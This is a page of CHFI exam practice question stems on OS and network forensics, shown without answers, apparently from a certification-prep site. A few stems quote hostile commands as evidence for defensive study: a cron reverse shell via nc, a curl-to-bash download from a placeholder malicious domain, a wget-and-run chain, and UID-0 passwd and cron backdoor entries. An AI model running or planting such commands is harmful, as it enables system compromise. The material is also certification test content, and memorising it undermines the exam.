Practice CHFI OS and Network Forensics questions with full explanations on every answer.
Start practicing
OS and Network Forensics — choose a session length
Free · No account required
Click any question to see the full explanation and answer options, or start a focused practice session above.
A security analyst investigates a Windows system and finds an event with ID 4625 in the Security log. What does this event indicate?
2During a forensic analysis of a compromised Linux server, you notice that the file /var/log/auth.log has been cleared. However, you find that the attacker's commands are still partially recoverable. Which artifact most likely contains the attacker's command history?
3A forensic analyst recovers a USB device from a suspect's computer. Which Windows registry key should be examined to determine the first time the USB device was connected?
4An analyst suspects that an attacker used a web shell to execute commands on a Windows web server. Which Windows event ID should the analyst look for to detect service installation that may have been used for persistence?
5A forensic examiner is analyzing a Mac system and wants to review system logs that record various activities, including application launches and kernel events. Which logging system on macOS should be examined?
6In Windows forensics, which artifact is used to track recently accessed files and folders via the 'Recent Items' feature?
7A network analyst is reviewing a packet capture and sees a large number of TCP SYN packets sent to various ports on a single host from multiple source IPs. This pattern is most indicative of which type of attack?
8During a Linux forensic investigation, you find that the file /etc/cron.d/evil contains the entry: '* * * * * root /bin/bash /root/backdoor.sh'. What persistence mechanism is being used?
9Which of the following Windows registry keys is commonly used by malware to achieve persistence by executing a program at user logon?
10In network forensics, which tool is commonly used to analyze and visualize NetFlow data to identify network traffic patterns?
11A forensic analyst is examining a Windows system and finds that the UserAssist key in the NTUSER.DAT hive contains entries with Rot13-encoded names. What is the primary purpose of the UserAssist key?
12An attacker has compromised a Linux server and edited the /etc/passwd file to change a user's UID to 0. What is the likely goal of this modification?
13A forensic analyst is examining a Windows system and wants to identify recently accessed files and programs. Which TWO artifacts should the analyst prioritize? (Select TWO.)
14A security team is analyzing a compromised Linux server. Indicators suggest the attacker used a web shell. Which THREE of the following are common persistence mechanisms that may be found on the system? (Select THREE.)
15An investigator is analyzing a Windows system and wants to find evidence of USB device usage. Which TWO registry keys should be examined? (Select TWO.)
16A security analyst reviews Windows Security Event Logs and finds multiple Event ID 4625 entries from a single source IP address targeting various usernames. Which type of attack is MOST likely occurring?
17During a forensic investigation of a compromised Linux server, you find the following entry in /var/log/auth.log: 'Mar 10 03:14:15 server sshd[1234]: Accepted publickey for root from 10.0.0.5 port 54321 ssh2: RSA SHA256:AbCdEf123456'. Which artifact should you examine next to determine if unauthorized key-based access occurred?
18Which Windows artifact is primarily used to determine the execution history of applications, including the path and run count?
19A forensic analyst discovers an unusual entry in the Windows Registry under 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run'. Which persistence mechanism does this represent?
20In a macOS forensic investigation, which log system provides a timeline of high-level system events such as application launches and user logins?
21A network forensic analyst examines a pcap file in Wireshark and sees an HTTP POST request to '/shell.jsp' with a parameter 'cmd' containing 'dir'. The response contains a directory listing. Which intrusion artifact is indicated?
22During a Linux forensic investigation, you find a suspicious cron job in /etc/cron.d/malware that runs every 5 minutes as root. Which persistence mechanism is being used?
23Which tool is commonly used for timeline analysis in digital forensics, combining multiple artifacts into a super timeline?
24An analyst detects a large amount of data being exfiltrated from a network over DNS queries. Which type of network analysis would BEST detect this activity?
25A Windows system's registry key 'HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR' contains a subkey with a serial number. What does this artifact indicate?
26A forensic analyst finds a file with the .plist extension on a Mac system. What type of artifact is this?
27During a forensic analysis of a compromised Linux system, you notice that the /proc filesystem contains a suspicious entry /proc/12345/exe pointing to /tmp/.hidden/malware. What conclusion can you draw?
28Which TWO Windows Event IDs are associated with successful logon or explicit credential usage? (Choose TWO.)
29Which THREE of the following are commonly used for persistence on a Windows system? (Choose THREE.)
30Which TWO Linux log files are MOST relevant for investigating authentication events and user login activity? (Choose TWO.)
31During a Windows forensic investigation, an analyst finds a registry key under NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count. What type of artifact is this, and what information does it typically contain?
32In Linux forensics, an investigator examines /var/log/auth.log and finds repeated entries of "Failed password for root from 10.0.0.5 port 22 ssh2". Which type of attack is most likely indicated?
33A security analyst reviews the following Windows Event log entry: Event ID 4648 with logon type 3, subject user 'CONTOSO\admin', target server 'FS01', target user 'CONTOSO\backupadmin'. What does this event indicate?
34A forensic examiner needs to extract timeline data from a compromised Linux system for analysis with log2timeline/Plaso. Which of the following command sequences should be used?
35In network forensics, an analyst captures traffic and sees a large number of ICMP echo requests from 10.0.0.1 to 10.0.0.2 with varying payload sizes. What is the most likely scenario?
36During a Mac OS X forensic investigation, an analyst wants to review user application usage and system events for the last week. Which artifact provides a centralized, binary log of these activities?
37An incident responder finds a suspicious LNK file in a user's Startup folder on a Windows system. The LNK file's target is "C:\Windows\System32\rundll32.exe" with a command-line argument "javascript:" followed by encoded text. What is the most likely purpose of this shortcut?
38A forensic examiner is analyzing a compromised Linux server and notices that /etc/cron.daily contains a script named 'sysupdate.sh' that runs a base64-encoded command. Which persistence mechanism is being used?
39In a Windows forensic investigation, the analyst wants to determine which USB devices were connected to the system, including the device serial number and first/last connection times. Which registry hive and key should be examined?
40Which Wireshark filter should an analyst use to display only TCP packets that have the SYN flag set and the ACK flag not set?
41An analyst reviews proxy logs and sees repeated requests to a known malicious domain from multiple internal hosts, each using a different User-Agent string. The requests are all GET requests for /images/icon.png. What technique is most likely being used to evade detection?
42Which Windows Event ID is generated when a service is installed on a system?
43Which TWO of the following are valid artifacts for determining program execution on a Windows system? (Select TWO.)
44Which THREE of the following are common indicators of a web shell on a compromised web server? (Select THREE.)
45Which TWO of the following tools are primarily used for timeline analysis in digital forensics? (Select TWO.)
46A forensic analyst examining a Windows machine finds a suspicious service named 'SrvMon' installed. The System event log shows Event ID 7045 at the time of compromise. What does this event indicate?
47During a Linux forensic investigation, you find that the file /var/log/auth.log has been deleted. Which of the following artefacts would BEST help determine recent SSH login attempts?
48An analyst reviews Windows Registry for USB device usage history. Which registry hive and key contain the 'USBSTOR' key that logs unique serial numbers of connected USB drives?
49A network forensics analyst captures traffic and sees a series of TCP SYN packets sent to multiple ports on a target, with no corresponding SYN-ACK replies. What type of activity is MOST likely indicated?
50In Windows forensics, which artifact is a database of metadata about files and applications accessed by the user, used to populate the 'Recent Items' and 'Quick Access' lists?
51A forensic examiner finds a suspicious entry in the Linux file /etc/passwd: 'backdoor:x:0:0:root:/root:/bin/bash'. What is the MOST significant security issue with this entry?
52A security analyst needs to examine network traffic for signs of a data exfiltration attempt. Which tool is specifically designed for deep packet inspection and can reconstruct TCP streams?
53During a Mac forensic investigation, you examine the unified log for process execution around the time of an incident. Which command-line tool is used to query the macOS unified log?
54A forensic analyst finds multiple Prefetch files in C:\Windows\Prefetch with recent timestamps. What is the primary value of Prefetch files in an investigation?
55In network forensics, which type of log is BEST for identifying all outbound connections from internal hosts to external IP addresses on specific ports?
56A forensic tool outputs a timeline of file system events. The analyst needs to correlate registry modifications with file creation times. Which tool is specifically designed for super timeline creation from multiple sources?
57An investigator finds a suspicious LNK file on a Windows desktop pointing to an executable in the Temp folder. What is the significance of LNK files in forensic analysis?
58A forensic analyst is investigating a Windows system for persistence mechanisms. Which TWO registry locations are commonly used by malware to achieve auto-start? (Select TWO.)
59An analyst is reviewing a Linux system for signs of a rootkit. Which THREE of the following are common indicators of a rootkit infection? (Select THREE.)
60A network forensic investigator is analyzing traffic from a compromised web server. Which TWO artifacts are MOST likely to indicate the presence of a web shell? (Select TWO.)
61A security analyst reviews Windows Security event logs and finds Event ID 4625 with Logon Type 10. What does this indicate?
62Which Windows Registry hive is primarily used to store user-specific application settings and recently accessed files?
63During a Linux forensic investigation, you find that the /var/log/auth.log file contains log entries showing multiple 'Failed password for root' messages from a single IP address, followed by a 'Accepted password for root' entry. What is the MOST likely conclusion?
64Which tool is commonly used for timeline analysis in digital forensics, allowing examiners to parse and correlate timestamps from various artifacts?
65In Windows forensics, which artifact is used to track recently executed programs on a per-user basis?
66A network forensic analyst captures packets and sees a TCP SYN packet sent to port 80, followed by a SYN-ACK, then an ACK, and then an HTTP GET request. What can be concluded?
67During a forensic examination of a macOS system, you find a file at /private/var/log/system.log and also notice a directory /private/var/db/diagnostics/. What is the significance of these locations?
68Which Windows Event ID is generated when a new service is installed on a system?
69A security analyst is investigating a potential intrusion and finds a webshell on a Linux web server. Which of the following logs would be MOST useful to determine how the webshell was uploaded?
70In Windows registry forensics, which key is examined to identify USB devices that were connected to the system?
71A forensic examiner is analyzing a compromised Linux system and finds a suspicious cron job in /var/spool/cron/crontabs/root that executes a script every hour. The script is located in /tmp/.hidden/update.sh. What is the BEST next step?
72Which network forensic technique involves analyzing the flow of network traffic to identify patterns and anomalies, often using tools like SiLK or nfdump?
73Which TWO of the following artifacts are used for timeline analysis in digital forensics? (Select two.)
74Which THREE of the following are indicators of a web shell on a web server? (Select three.)
75Which TWO of the following are persistence mechanisms commonly found in Windows forensics? (Select two.)
76A security analyst is reviewing Windows Security Event Logs and notices multiple Event ID 4625 entries for a single user account within a short time frame. What does this MOST likely indicate?
77During a forensic investigation of a compromised Linux server, the investigator examines the bash_history file of the root user. She finds the command: wget http://malicious.site/shell.sh && chmod +x shell.sh && ./shell.sh. What is the MOST likely intent of this command sequence?
78A forensic analyst is examining a Windows 10 system for evidence of USB device usage. Which registry hive and key path should she check to find a list of USB devices that have been connected to the system?
79A SOC analyst is analyzing a packet capture from a network where an internal host communicated with a known malicious IP. The analyst uses Wireshark and applies a display filter to isolate all HTTP traffic. Which filter expression should he use?
80In Linux forensics, which file contains information about user account passwords in hashed form?
81A forensic investigator is examining a Mac system and wants to review recently accessed files and applications. Which macOS artifact is MOST useful for this purpose?
82During a network forensic investigation, the analyst examines firewall logs and notices a large number of outbound connections from an internal server to various IP addresses on port 443 at regular intervals. The connections are all initiated by a process called 'svchost.exe' running from a non-standard location (C:\Windows\Temp). What is the MOST likely explanation?
83Which Windows artifact is specifically designed to track the most recently used (MRU) files for specific applications and can be found in the NTUSER.DAT registry hive?
84Which tool is commonly used in timeline analysis for digital forensics to parse various artifacts and create a super timeline?
85A forensic analyst is examining a Windows system for evidence of a program that runs automatically every time the system starts. Which registry key is commonly used to achieve persistence via the 'Run' key?
86An incident responder is analyzing a Linux system and finds a suspicious process running as root. To determine the full command line and environment variables of the process with PID 1234, which file in the /proc filesystem should she examine?
87A forensic analyst is examining browser history from a Chrome installation on a Windows system. Where is the Chrome history database typically stored?
88Which TWO Windows Event IDs are associated with successful and failed logon events? (Select two.)
89Which THREE of the following are common persistence mechanisms found in Linux systems? (Select three.)
90Which TWO of the following are tools commonly used for network forensics analysis? (Select two.)
91A forensic analyst is examining a Windows 10 system and finds suspicious activity. Which registry hive contains user-specific configuration data that can reveal evidence of recent file access through ShellBags, UserAssist, and MRU lists?
92During an incident response on a Linux server, you find the following entry in /var/log/auth.log: "Mar 10 12:34:56 server sshd[1234]: Failed password for root from 10.0.0.5 port 34567 ssh2". Which of the following is the BEST immediate action to prevent further unauthorized access?
93A security analyst is reviewing Windows Event Logs and notices multiple Event ID 4625 entries for a single user account within a short time frame. What does this most likely indicate?
94A forensic analyst is investigating a Windows system for evidence of USB device usage. Which registry key is MOST useful for determining the first time a USB device was connected and its serial number?
95During a forensic investigation of a Linux system, you need to determine which commands a user executed in their shell session. Which file would you examine to find this information?
96Which Windows Event ID is generated when a new service is installed on a system, and is often used by malware to establish persistence?
97A forensic analyst is examining a Mac system for evidence of recent file access. Which artifact provides a timeline of file system events with high precision and is commonly analyzed using tools like mac_apt?
98A network analyst captures traffic and sees an HTTP request containing: GET /wp-content/uploads/evil.php?cmd=id HTTP/1.1. Which of the following is MOST likely occurring?
99A forensic analyst is using Plaso (log2timeline) to create a super timeline from a compromised Windows system. Which of the following is the PRIMARY advantage of using Plaso over manual timeline creation?
100Which tool is specifically designed for timeline analysis in digital forensics and is the command-line version of the log2timeline framework?
101During a forensic examination of a Windows 10 system, you find a file named "chrome_000001.jumplist" in the user's AppData directory. What does the presence of this file indicate?
102A security analyst is reviewing firewall logs and notices repeated connection attempts from an internal IP to an external server on TCP port 4444. The internal host is a web server. What is the MOST likely explanation?
103A forensic analyst is investigating a Windows system for evidence of malware persistence. Which TWO registry locations are commonly used by malware to automatically execute on system startup?
104A security analyst is analyzing network traffic and sees the following: Source IP 10.0.0.1, Destination IP 203.0.113.5, TCP SYN flag set, destination port 445. The analyst suspects a worm propagation attempt. Which TWO additional pieces of evidence would strengthen this conclusion?
105A forensic investigator is examining a Linux system compromised via a web application. Which THREE artifacts should the investigator prioritize to determine the attacker's entry point and post-exploitation activities?
106A security analyst detects a sudden spike in failed logon events with Event ID 4625 on a Windows domain controller. The source IP addresses are random and from various external subnets. Which type of attack is MOST likely occurring?
107During a forensic investigation of a Windows 10 system, an examiner finds the following registry key: NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count. The values contain Rot‑13 encoded data. What is the primary purpose of this artifact?
108An analyst is examining a Linux server and issues the command: cat /var/log/auth.log | grep 'Failed password' | awk '{print $1,$2,$3,$9,$11}' | sort | uniq -c. What is the analyst most likely trying to determine?
109Which Windows registry hive should be examined to determine the last time a specific external USB drive was connected to a system?
110A forensic analyst is investigating a macOS system and wants to review a timeline of past application launches and file accesses across multiple days. Which forensic artifact is BEST suited for this purpose?
111A network analyst captures a packet with Wireshark showing a TCP SYN packet from IP 10.0.0.5 to 192.168.1.10 port 443, followed immediately by a SYN‑ACK from 192.168.1.10 to 10.0.0.5, then an RST from 10.0.0.5. What does this sequence MOST likely indicate?
112Which Windows Event ID is generated when a new service is installed on a system?
113During an incident response, an analyst finds the following entry in /etc/crontab: */5 * * * * root /bin/bash -c 'curl -s http://malicious.com/script.sh | bash'. What is the MOST likely purpose of this entry?
114A forensic examiner needs to analyze the contents of a Windows prefetch file (.pf) to determine the last execution time of an application. Which tool would BEST accomplish this task?
115In Linux, which file contains hashed user passwords?
116An analyst reviews NetFlow logs and sees a single internal host communicating with multiple external IPs on port 53 (DNS) over a short period, with each session transferring approximately 1500 bytes. What suspicious activity might this indicate?
117A Windows system has been compromised. The analyst finds a registry run key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run with value name 'UpdateService' pointing to C:\Users\Public\svchost.exe. Why is this particularly suspicious?
118Which TWO Windows artifacts can be used to identify recently accessed files or folders on a system? (Select the two best answers.)
119A forensic examiner is analyzing a Linux system suspected of being used as a C2 server. Which THREE artifacts should the examiner prioritize to find evidence of command execution and persistence? (Select three.)
120Which TWO of the following are common persistence mechanisms used by malware on Windows systems? (Select two.)
121A security analyst reviews Windows Security Event Log and observes Event ID 4625 repeatedly for a single user account from a remote IP address within a short timeframe. What is the MOST likely cause?
122During a forensic investigation of a compromised Linux server, an analyst checks /var/log/auth.log and finds multiple entries like "Failed password for root from 10.0.0.5 port 22 ssh2". Which tool is BEST suited to analyze the timeline of these events?
123A forensic analyst finds a suspicious .plist file in /Library/LaunchDaemons/ on a macOS system. The file contains a key "ProgramArguments" with a path to a script in /tmp. Which persistence mechanism does this indicate?
124A network forensics analyst captures traffic from a suspected data exfiltration. In Wireshark, filtering for DNS queries containing a long subdomain with base64-encoded text suggests which technique?
125Which Windows Registry hive contains user-specific configuration such as MRU lists and UserAssist artifacts?
126A Linux system is suspected of being used as a pivot point. An analyst checks /proc/[pid]/fd/ and sees open file descriptors pointing to sockets. Which command would BEST determine the remote connections associated with these sockets?
127A forensic examiner recovers a Windows 10 system and finds a prefetch file for powershell.exe with a last run time of 3 days ago, but the system's security logs show no interactive logons from that user. What does this discrepancy suggest?
128An analyst identifies an unknown binary running on a Linux server. Which /proc filesystem entry would provide the command-line arguments used to start the process?
129In a macOS forensic investigation, which log system stores high-level events such as application launches and authentication attempts in a binary format, and can be queried using the 'log' command?
130A security team detects exfiltration via HTTP POST requests to a suspicious domain. Which network forensic technique would BEST identify the data being sent in these requests?
131During a forensic examination of a compromised Windows server, you find a registry key under HKLM\SYSTEM\CurrentControlSet\Services that points to a malicious DLL. Which event ID would have been generated when this service was installed?
132A Linux investigator wants to see all commands run by a user from the bash shell. Which file should be examined?
133A forensic analyst is examining a Windows system for evidence of USB device usage. Which TWO registry locations are known to store USB device history?
134A security analyst is investigating a potential webshell on an IIS server. Which THREE artifacts are commonly associated with webshell presence?
135An analyst is reviewing firewall logs and sees repeated outbound connections from an internal host to a known malicious IP on port 443. Which TWO network forensic data sources would BEST help determine if data exfiltration occurred?
136A security analyst reviews Windows Event Logs and sees Event ID 4625 multiple times for a single user account from a remote IP address within a short time frame. What is the MOST likely interpretation?
137During a forensic investigation, you find a file named ntuser.dat.LOG1 in a user's profile directory. What is the primary purpose of this file?
138A Linux system administrator notices unusual outbound connections from a server. Which of the following commands would MOST effectively capture a list of all current network connections along with the associated process IDs?
139A forensic analyst is investigating a Windows 10 system and needs to determine if a USB device was ever connected. Which registry key would provide a comprehensive list of USB devices that have been attached, including the first and last connection times?
140An analyst captures network traffic during an incident and wants to extract files transferred over HTTP. Which Wireshark feature is BEST suited for this task?
141During a forensic examination of a macOS system, an investigator wants to review application execution history. Which artifact contains a chronological record of application launches, including timestamps and process IDs?
142A security team detects a suspicious process that writes to the Windows registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run. What is the MOST likely purpose of this activity?
143Which Linux log file is the PRIMARY source for authentication-related events such as user logins, sudo usage, and failed authentication attempts?
144A forensic analyst is examining a Windows system and finds a prefetch file named NOTEPAD.EXE-12345678.pf. What information can be gleaned from this artifact? (Select the BEST answer.)
145During a network breach investigation, an analyst examines NetFlow records and sees large data transfers from a server to an external IP address during off-hours. Which type of activity does this MOST likely indicate?
146A forensic analyst needs to create a timeline of file system activity from a disk image. Which tool is specifically designed for this purpose and can parse various artifacts such as registry, prefetch, and log files?
147An incident responder examines a Linux server and finds a suspicious cron job that runs every minute and executes a script located in /tmp. Which persistence technique does this represent?
148Which TWO Windows registry hives are most commonly analyzed during a forensic investigation to determine user activity and system configuration? (Select TWO.)
149Which THREE of the following are common indicators of a web shell presence on a compromised IIS web server? (Select THREE.)
150Which TWO of the following are primary locations for browser history artifacts in a Windows 10 system? (Select TWO.)
151A security analyst reviews Windows Security Event Log and finds multiple Event ID 4625 entries for a single user account within a few seconds. What does this pattern MOST likely indicate?
152During a forensic investigation of a Windows system, an analyst examines the NTUSER.DAT registry hive. Which artifact would MOST likely be found to identify recently accessed documents and folders via the Windows Explorer GUI?
153A Linux system administrator notices that the /var/log/auth.log file shows many 'Failed password for root' entries from a single IP address within a short timeframe. Which tool would BEST help the administrator block further access from that IP?
154During a Mac forensic examination, an investigator needs to find evidence of recently executed applications and accessed files. Which artifact should the investigator prioritize for reconstructing user activity?
155A network analyst captures suspicious traffic and uses Wireshark to examine packets. The analyst notices many TCP SYN packets sent to various ports on a single host with no SYN-ACK replies. What type of activity is MOST likely observed?
156A forensic analyst is performing timeline analysis on a compromised system. Which tool is specifically designed to parse multiple log sources and create a super timeline?
157A Windows system is suspected of having malware that maintains persistence by starting every time a user logs in. Which registry key should be examined FIRST for this persistence mechanism?
158A forensic analyst finds an LNK file on a Windows system pointing to a script located in a temporary folder. The LNK file's timestamps show creation time after the script's known execution time. What does this discrepancy likely indicate?
159A security analyst reviews firewall logs and sees repeated outbound connections from an internal server to an external IP on port 443. The server is not supposed to initiate outbound connections. Which action should the analyst take FIRST?
160In Linux forensics, which file contains user account information including the user ID, group ID, home directory, and default shell?
161An investigator finds a webshell on a compromised web server. Which artifact would be MOST useful to determine what commands were executed through the webshell?
162During a forensic analysis of a Linux system, the investigator finds that the bash_history file is empty for the root user. However, the system has been used actively. What is the MOST likely explanation?
163Which TWO Windows Event IDs are associated with successful logon events? (Select two.)
164A forensic analyst is examining a network packet capture for signs of data exfiltration. Which THREE of the following are common indicators of data exfiltration over DNS? (Select three.)
165In a Mac forensic investigation, which TWO artifacts are valuable for determining the timeline of file access? (Select two.)
166A security analyst observes multiple Event ID 4625 logon failures for a single user account within a short time frame, followed by Event ID 4624 logon success. Which attack technique is MOST likely indicated?
167During a forensic investigation, you find a prefetch file created at 03:15:22 UTC on the system. The corresponding executable's last modified timestamp is 02:30:00 UTC, and the system date/time shows a discrepancy of +5 minutes. What is the MOST accurate interpretation regarding the file execution time?
168Which Windows registry hive stores user-specific configuration and is loaded when a user logs in, containing artifacts such as recently accessed files and application settings?
169A Linux system administrator notices unusual outbound connections from a server. Which log file should be examined FIRST to identify authentication attempts related to the compromised account?
170During a network forensic investigation, an analyst examines a pcap file and finds multiple TCP SYN packets sent to a target IP on port 80, each from a different source IP address. No SYN-ACK packets are returned, but the target continues to send SYN-ACK responses for earlier packets. What attack is MOST likely occurring?
171Which tool is specifically designed for timeline analysis of forensic artifacts across multiple systems and can process output from various forensic tools?
172A forensics examiner finds a suspicious entry in the Windows Registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run pointing to a PowerShell command. Which persistence mechanism does this represent, and what is the MOST likely impact?
173In Mac forensics, which artifact stores system-wide and per-user application preferences, often used to determine configured settings and recently accessed files?
174Which Windows Event ID is generated when a new service is installed on the system?
175A forensic analyst is examining a compromised Linux server and finds a suspicious binary running as a service. Which file should be checked to determine if the binary is set to start at boot?
176During a network forensics investigation, an analyst reviews NetFlow data and notices a one-way flow of UDP traffic from an internal host to an external IP on port 53. However, the packet capture shows the external IP responding with large DNS responses. What type of data exfiltration technique is MOST likely being used?
177A forensics investigator finds a suspicious LNK file on a Windows system that points to a script located on a remote share. What is the PRIMARY forensic significance of this LNK file?
178Which TWO artifacts are commonly used to identify USB device insertion history on a Windows system? (Select TWO.)
179Which THREE of the following are indicators of a webshell on a compromised web server? (Select THREE.)
180Which TWO of the following are typical sources of evidence for network forensics? (Select TWO.)
181A security analyst reviews Windows Security Event Log and notices multiple Event ID 4625 entries for a single user account from various IP addresses within a short time frame. What is the MOST likely attack being attempted?
182During a Linux forensic investigation, you find the following entry in /var/log/auth.log: "Accepted publickey for root from 203.0.113.5 port 54321 ssh2: RSA SHA256:abc...". The user claims they never connect from that IP. Which forensic artifact should you examine next to confirm unauthorized access?
183A forensic analyst examines a Mac system and runs "log show --predicate 'eventMessage contains "disk"' --last 1h" in Terminal. This command extracts Unified Log entries related to disk activity. Which macOS forensic artifact is the analyst MOST likely querying?
184In Windows registry forensics, which registry hive contains the SAM database storing local user account hashes?
185A network forensic analyst captures traffic that includes the following Wireshark filter: "tcp.port == 22 and tcp.flags.syn == 1 and tcp.flags.ack == 0". What type of traffic is this filter selecting?
186During a Windows forensic analysis, you find a suspicious LNK file in a user's Recent folder. Which of the following is NOT typically retrievable from an LNK file?
187A forensic tool parses the Windows registry and reveals that a USB device with VID_0781&PID_5583 was last connected on 2023-10-01. Which registry key is the MOST likely source of this information?
188Which Linux log file is the primary source for authentication-related events, including SSH login attempts and sudo usage?
189An incident responder finds the following entry in a Linux cron job: "*/5 * * * * root nc -e /bin/sh 10.0.0.5 4444". What is the purpose of this cron job?
190A forensic examiner uses Plaso (log2timeline) to create a timeline from a disk image. Which of the following artifacts would NOT be included in the timeline by default using the 'all' parser?
191In a Windows forensic investigation, which registry key is used to examine programs that automatically start at system boot for all users?
192Which network forensic tool is BEST suited for analyzing NetFlow data to identify top talkers and detect anomalies?
193A forensic analyst is investigating a Windows system and wants to identify recently executed programs. Which TWO artifacts should the analyst examine?
194A security analyst detects suspicious outbound traffic to multiple external IPs on port 443. Which THREE network forensic data sources should be examined to identify the infected host and the nature of the communication?
195During a macOS forensic investigation, which TWO artifacts would be MOST helpful in determining when a file was downloaded from the internet?
196A security analyst reviewing Windows Security Event Logs sees multiple Event ID 4625 entries for a single user account, followed by a successful Event ID 4624. The account is a domain administrator. What is the MOST likely explanation?
197During a forensic investigation of a compromised Linux server, you find the following entry in /var/log/auth.log: 'Mar 10 02:15:30 server sshd[1234]: Failed password for root from 10.0.0.5 port 54321 ssh2'. Which command would you use to extract all failed root login attempts from this log?
198An investigator is analyzing a Windows 10 system suspected of malware persistence. Which registry key is commonly used by malware to achieve persistence by running a program at every user logon?
199In network forensics, which tool is specifically designed for packet capture and analysis, allowing examiners to inspect individual packets and reconstruct network conversations?
200During a forensic examination of a Mac system, an investigator needs to recover historical record of file system events, such as file modifications and deletions. Which artifact should they examine?
201An analyst is examining a PCAP file in Wireshark and notices a series of TCP SYN packets sent to multiple ports on a single IP address, with no subsequent SYN-ACK replies. What type of network activity does this indicate?
202Which TWO of the following are Windows artifacts that can provide evidence of file execution, including timestamps and paths?
203Which TWO of the following registry keys are commonly used to maintain persistence on Windows systems by automatically starting programs?
204Which TWO of the following are common Linux log files that can be used for forensic analysis?
205Which TWO of the following are forensic artifacts found on macOS systems that can help reconstruct user activity?
206Which THREE of the following are indicators of a webshell compromise on a web server?
207Which THREE of the following are Windows Event IDs that are particularly useful for investigating account logon activities?
208Which THREE of the following are commonly used network forensic data sources?
209Which TWO of the following are tools that can be used for timeline analysis in digital forensics?
210Which THREE of the following are persistence mechanisms that can be used on Linux systems?
211A forensic analyst reviews a Windows system for signs of malware persistence. Which TWO registry locations are commonly used to achieve persistence via auto-start programs?
212During a Linux forensic investigation, an analyst examines the file /var/log/auth.log and finds repeated entries with 'Failed password for root from 192.168.1.200 port 22 ssh2'. Which TWO conclusions can the analyst draw from this evidence?
213A security analyst captures network traffic and observes multiple TCP SYN packets sent to a range of IP addresses on port 445, followed by TCP RST packets after 15 seconds. Which THREE indicators suggest this is a network scan?
214During a Windows forensic investigation, an analyst finds prefetch files with the .pf extension. Which TWO pieces of information can the analyst obtain from analyzing prefetch files?
215A forensic analyst is examining a Mac system for evidence of malicious activity. Which THREE artifacts are commonly analyzed in macOS forensics?
216A network security analyst reviews firewall logs and identifies a high volume of outbound DNS queries to a known malicious domain from multiple internal hosts. Which THREE actions should the analyst take immediately?
The OS and Network Forensics domain covers the key concepts tested in this area of the CHFI exam blueprint published by EC-Council. Courseiva provides free domain-focused practice, mock exams, missed-question review, and readiness tracking across all CHFI domains — no account required.
The Courseiva CHFI question bank contains 216 questions in the OS and Network Forensics domain. Click any question to see the full explanation and answer breakdown.
Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.
Yes — the session launcher on this page draws questions exclusively from the OS and Network Forensics domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.
Save your results, see per-domain analytics, and get readiness scores — free, for every certification.
Sign Up FreeFree forever · Every certification included